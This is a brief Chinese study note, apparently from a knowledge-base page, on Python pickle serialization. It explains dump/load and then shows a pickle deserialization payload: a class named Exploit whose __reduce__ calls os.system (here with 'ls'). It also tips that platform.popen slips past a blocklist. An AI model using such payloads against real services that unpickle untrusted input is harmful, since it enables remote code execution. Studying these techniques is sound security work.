0%

pickle

pickle

pickle.dump(obj, file[, protocol])
序列化对象,并将结果数据流写入到文件对象中。参数protocol是序列化模式,默认值为0,表示以文本的形式序列化。protocol的值还可以是1或2,表示以二进制的形式序列化。
pickle.load(file)
反序列化对象。将文件中的数据解析为一个Python对象。

pickle.dumps和pickle.loads是对字符串做处理

pickle序列化主要是把需要存储的字典,列表,或者对象转化成一种固定的格式便于存储

image.png

platform.popen()不在名单里,它可以做到类似system的功能

1
2
3
class Exploit(object):
def __reduce__(self):
return map,(os.system,["ls"])

来源: https://www.yuque.com/guansuanbangzhuangganjun/oxmbxg/vrfx1dd8xhir4qk0
语雀文档ID: 139704982